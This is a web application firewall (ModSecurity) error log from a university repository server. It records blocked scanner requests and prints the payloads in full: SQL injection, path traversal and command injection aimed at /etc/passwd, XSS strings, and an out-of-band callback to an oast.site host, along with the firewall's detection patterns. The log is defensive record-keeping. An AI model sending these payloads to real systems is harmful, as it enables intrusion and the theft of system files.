[Tue Aug 29 11:35:29.300751 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 1 UNION ALL SELECT NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11kcCo-f0AAAUbg3IAAABQ"]
[Tue Aug 29 11:35:29.333916 2023] [:error] [pid 1391] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:clientId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:clientId: {{id}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/asyncrenderer/{{url}}"] [unique_id "ZO11kcCo-f0AAAVvlH8AAAAe"]
[Tue Aug 29 11:35:30.322178 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat${ifs}/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/network_test.php"] [unique_id "ZO11ksCo-f0AAAUKhCwAAABC"]
[Tue Aug 29 11:35:32.303211 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:data_target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:data_target: vote_score = 1 AND (SELECT 3 FROM (SELECT(SLEEP(6)))gwe)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lMCo-f0AAAPDoTkAAAAP"]
[Tue Aug 29 11:35:32.318229 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:filename: ../../../../../../home/talariuser/www/app/webroot/files/2UdxkuPYBktPaU9ruKB9Vm8sOw9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Collector/appliancesettings/applianceSettingsFileTransfer"] [unique_id "ZO11lMCo-f0AAAUOaX0AAABG"]
[Tue Aug 29 11:35:32.337386 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/nette.micro/"] [unique_id "ZO11lMCo-f0AAAT2JUMAAAAz"]
[Tue Aug 29 11:35:33.328467 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id_form. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id_form: 1 UNION ALL SELECT NULL,NULL,md5(999999999),NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAASHiAoAAAAD"]
[Tue Aug 29 11:35:33.377252 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:arp_template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:arp_template_id: 1 AND (SELECT 8948 FROM (SELECT(SLEEP(6)))iIic)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lcCo-f0AAASEJbQAAAAE"]
[Tue Aug 29 11:35:34.305190 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/cab-fare-calculator/tblight.php"] [unique_id "ZO11lsCo-f0AAAUNapwAAABF"]
[Tue Aug 29 11:35:34.316496 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: test' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11lsCo-f0AAAPDoT4AAAAP"]
[Tue Aug 29 11:35:34.335649 2023] [:error] [pid 1387] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:fingerprint. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:fingerprint: (SELECT SLEEP(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11lsCo-f0AAAVr@TUAAAAZ"]
[Tue Aug 29 11:35:35.392045 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:queriesCnt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:queriesCnt:  cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11l8Co-f0AAAUKhDsAAABC"]
[Tue Aug 29 11:35:35.396859 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11l8Co-f0AAAUbg38AAABQ"]
[Tue Aug 29 11:36:24.504352 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ); --\\x22 found within ARGS:table_name: pg_user\\x22; select pg_sleep(6); --\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/v2/open/rowsInfo"] [unique_id "ZO11yMCo-f0AAAUbg5gAAABQ"]
[Tue Aug 29 11:36:24.543292 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../..// found within ARGS:file_name: ../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/tsaupload.cgi"] [unique_id "ZO11yMCo-f0AAASEJcsAAAAE"]
[Tue Aug 29 11:36:24.861484 2023] [:error] [pid 1285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11yMCo-f0AAAUFdhQAAAA9"]
[Tue Aug 29 11:36:26.085376 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Rule 7fe1c67ac3c8 [id "981246"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "239"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/xmlpserver/services/XMLPService"] [unique_id "ZO11ysCo-f0AAAWa-UIAAAAI"]
[Tue Aug 29 11:36:26.585146 2023] [:error] [pid 1434] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11ysCo-f0AAAWa-U0AAAAI"]
[Tue Aug 29 11:36:28.404178 2023] [:error] [pid 1407] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ccmivr/IVRGetAudioFile.do"] [unique_id "ZO11zMCo-f0AAAV-t9sAAAAF"]
[Tue Aug 29 11:36:29.382582 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:true_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:true_path: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php/Pan/ShareUrl/downloadSharedFile"] [unique_id "ZO11zcCo-f0AAAWpXgUAAAAW"]
[Tue Aug 29 11:36:30.412645 2023] [:error] [pid 1405] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:folder: ../../../../../../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11zsCo-f0AAAV9bzAAAAAA"]
[Tue Aug 29 11:36:32.418978 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110MCo-f0AAATQXnkAAAAO"]
[Tue Aug 29 11:36:33.532438 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: % found within ARGS:keyword: %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%6d%64%35%28%39%39%39%39%39%39%39%29%29%2b%27"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mobile/plugin/browser.jsp"] [unique_id "ZO110cCo-f0AAASHiDcAAAAD"]
[Tue Aug 29 11:36:33.546907 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:controller: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO110cCo-f0AAASEJe8AAAAE"]
[Tue Aug 29 11:36:34.362910 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:ID: <svg onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO110sCo-f0AAAWpXgoAAAAW"]
[Tue Aug 29 11:36:34.364830 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:page: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/pandora_console/ajax.php"] [unique_id "ZO110sCo-f0AAATQXnsAAAAO"]
[Tue Aug 29 11:36:36.952494 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ACS_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../ found within ARGS:ACS_path: ../../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/advanced_component_system/index.php"] [unique_id "ZO111MCo-f0AAASEJf4AAAAE"]
[Tue Aug 29 11:36:37.392131 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAASEJgEAAAAE"]
[Tue Aug 29 11:36:37.440368 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:urlPath: file:///c://windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/getCorsFile"] [unique_id "ZO111cCo-f0AAAWx8y4AAAAg"]
[Tue Aug 29 11:36:38.402949 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:href. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:href: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/_s_/dyn/Log_highlight"] [unique_id "ZO111sCo-f0AAAUbg9MAAABQ"]
[Tue Aug 29 11:36:39.373825 2023] [:error] [pid 1457] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gu7g95r8rgczeu.oast.site found within TX:1: cjmnbitjmimt14dgn26gu7g95r8rgczeu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO1118Co-f0AAAWx8zQAAAAg"]
[Tue Aug 29 11:36:41.466554 2023] [:error] [pid 1447] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cID: \\x22></iframe><svg/onload=alert(\\x222UdyWLo0lCLqcBCjs5YehILlcGu\\x22)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ccm/system/panels/page/preview_as_user/preview"] [unique_id "ZO112cCo-f0AAAWnji0AAAAT"]
[Tue Aug 29 11:36:42.355477 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO112sCo-f0AAAWvFCQAAAAa"]
[Tue Aug 29 11:36:42.376752 2023] [:error] [pid 1461] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/LetsEncrypt/Index"] [unique_id "ZO112sCo-f0AAAW1WaMAAAAD"]
